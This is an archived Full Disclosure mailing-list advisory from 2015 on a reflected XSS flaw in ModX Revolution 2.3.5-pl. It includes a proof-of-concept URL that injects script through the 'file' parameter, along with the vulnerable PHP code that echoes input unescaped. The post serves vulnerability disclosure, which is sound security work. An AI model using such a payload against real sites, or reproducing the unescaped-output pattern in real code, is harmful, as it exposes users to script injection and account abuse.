[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] ModX Revolution 2.3.5 - Reflected XSS

To: fulldisclosure@xxxxxxxxxxxx
Subject: [FD] ModX Revolution 2.3.5 - Reflected XSS
From: "Curesec Research Team (CRT)" <crt@xxxxxxxxxxx>
Date: Tue, 18 Aug 2015 11:19:01 +0200

ModX Revolution 2.3.5-pl: Reflected Cross Site Scripting Vulnerability
Security Advisory – Curesec Research Team

1. Introduction

Affected Product:       ModX Revolution 2.3.5-pl        
Fixed in:               not fixed
Fixed Version Link:     n/a     
Vendor Contact:         hello@xxxxxxxx  
Vulnerability Type:     Reflected XSS   
Remote Exploitable:     Yes     
Reported to vendor:     07/14/2015      
Disclosed to public:    08/17/2015      
Release mode:           Full disclosure
CVE:    n/a     
Credits                 Tim Coen of Curesec GmbH        

2. Vulnerability Description

ModX Revolution 2.3.5-pl is vulnerable to reflected cross site
scripting. With this, it is possible to inject and execute arbitrary
JavaScript code. This can for example be used by an attacker to inject a
JavaScript keylogger, bypass CSRF protection, or perform phishing attacks.

The attack can be exploited by getting the victim to click a link or
visit an attacker controlled website.

3. Proof of Concept

The injection takes place into the file GET argument, which is echoed
inside script tags.

http://localhost/modx-2.3.5-pl/manager/?a=system/file/edit&file=xsstest",record:
{"name":"","basename":"","path":"","size":false,"last_accessed":"Jan 01,
1970 01:00:00 AM","last_modified":"Jan 01, 1970 01:00:00
AM","content":false,"image":false,"is_writable":false,"is_readable":false,"source":1},canSave:
0});});alert(1); </script>&wctx=mgr&source=1

4. Code


    manager/controllers/default/system/file/edit.class.php:28
        public function loadCustomCssJs() {

$this->addJavascript($this->modx->getOption('manager_url').'assets/modext/sections/system/file/edit.js');
            $this->addHtml('<script
type="text/javascript">Ext.onReady(function() {
                MODx.load({
                    xtype: "modx-page-file-edit"
                    ,file: "'.$this->filename.'"
                    ,record: '.$this->modx->toJSON($this->fileRecord).'
                    ,canSave: '.($this->canSave ? 1 : 0).'
                });
            });</script>');
        }

5. Solution

This issue was not fixed by the vendor.

5. Report Timeline

07/14/2015      Informed Vendor about Issue (no reply)
08/13/2015      Contacted Vendor again (no reply)
08/17/2015      Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/ModX-Revolution-235-pl-Reflected-Cross-Site-Scripting-Vulnerability-43.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] ModX Revolution 2.3.5 - Reflected XSS - Fixed Versions Released
  - From: Curesec Research Team (CRT)

Prev by Date: [FD] Bolt 2.2.4 - Code Execution
Next by Date: [FD] UNIT4TETA TETA WEB - Authorization Bypass vulnerability
Previous by thread: [FD] Bolt 2.2.4 - Code Execution
Next by thread: Re: [FD] ModX Revolution 2.3.5 - Reflected XSS - Fixed Versions Released
Index(es):
- Date
- Thread